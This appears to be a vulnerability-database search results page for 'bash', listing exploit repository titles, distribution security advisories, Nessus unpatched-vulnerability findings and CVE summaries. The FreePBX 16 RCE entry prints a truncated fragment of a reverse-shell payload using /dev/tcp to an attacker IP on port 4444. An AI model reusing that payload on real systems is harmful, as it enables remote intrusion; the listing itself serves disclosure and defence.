2582 matches found
Exploit for Code Injection in Rejetto Http_File_Server
CVE-2024-23692-EXP bash bash CVE-2024-...
OPENSUSE-SU-2024:10106-1 bash-4.4-92.1 on GA media
These are all security issues fixed in the bash-4.4-92.1 package on the GA media of openSUSE Tumbleweed...
OPENSUSE-SU-2024:13939-1 python-tqdm-bash-completion-4.66.4-1.1 on GA media
These are all security issues fixed in the python-tqdm-bash-completion-4.66.4-1.1 package on the GA media of openSUSE Tumbleweed...
bash bug fix and enhancement update
An update is available for bash. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. For detailed information on changes in this release, see the Rocky Linux 8.10...
curl: Denial of Service in curl Request - HTTP headers eat all memory
Vulnerability description not provided...
Exploit for OS Command Injection in Php
PHP RCE PoC CVE-2024-4577: Argument Injection in PHP-CGI...
Exploit for Improper Initialization in Linux Linux_Kernel
CVE-2022-0847-dirty-pipe-checker Bash script to check for CVE-...
RHEL 5 : bash (Unpatched Vulnerability)
The remote Redhat Enterprise Linux 5 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - bash: Specially crafted SHELLOPTS+PS4 variables allows command substitution (CVE-2016-7543) - The expansion...
RHEL 7 : bash (Unpatched Vulnerability)
The remote Redhat Enterprise Linux 7 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - bash: when effective UID is not equal to its real UID the saved UID is not dropped (CVE-2019-18276) - A...
FreePBX 16 - Remote Code Execution (Authenticated) Exploit
Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; echo $response =...
Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Checkpoint Quantum_Spark_Firmware
CVE-2024-24919 Checker A simple bash script to check for the...
Exploit for CVE-2024-2961
iconvfix Bash script to patch for CVE-2024-...
Exploit for CVE-2024-4956
CVE-2024-4956-Sonatype-Nexus-Repository-Manager Sonatype Ne...
CVE-2021-47452 netfilter: nf_tables: skip netdev events generated on netns removal
In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: skip netdev events generated on netns removal syzbot reported following harmless WARN: WARNING: CPU: 1 PID: 2648 at net/netfilter/core.c:468 nft_netdev_unregister_hooks net/netfilter/nf_tables_api.c:230 [inline]...
GHSA-CV5C-2QV5-W2M2 Passbolt Api Remote code execution
Passbolt provides a way for system administrators to generate a PGP key for the server during installation. The wizard requests a username, an e-mail address and an optional comment. No escaping or verification is done by Passbolt, effectively allowing a user to inject bash code. The impact is ve...
Passbolt Api Remote code execution
Passbolt provides a way for system administrators to generate a PGP key for the server during installation. The wizard requests a username, an e-mail address and an optional comment. No escaping or verification is done by Passbolt, effectively allowing a user to inject bash code. The impact is ve...
PT-2024-40250 · Passbolt · Passbolt
Name of the Vulnerable Software and Affected Versions: Passbolt affected versions not specified Description: The issue allows a user to inject bash code during the installation stage of Passbolt, as the system does not perform escaping or verification on the input provided for the username, e-mai...
CVE-2023-46870
The CVE concerns Nordic Semiconductor nRF Sniffer for Bluetooth LE (versions 3.0.0–4.1.1). A permissions misconfiguration in extcap/nrf_sniffer_ble.py, extcap/nrf_sniffer_ble.sh, and extcap/SnifferAPI/*.py can allow code execution by modifying these scripts. Public details in multiple sources con...
RHEL 8 : bash (Unpatched Vulnerability)
The remote Redhat Enterprise Linux 8 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - bash: BASH_CMD is writable in restricted bash shells (CVE-2019-9924) Note that Nessus has not tested for this issue bu...
RHEL 5 : bash (Unpatched Vulnerability)
The remote Redhat Enterprise Linux 5 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - bash: Specially crafted SHELLOPTS+PS4 variables allows command substitution (CVE-2016-7543) - bash: when...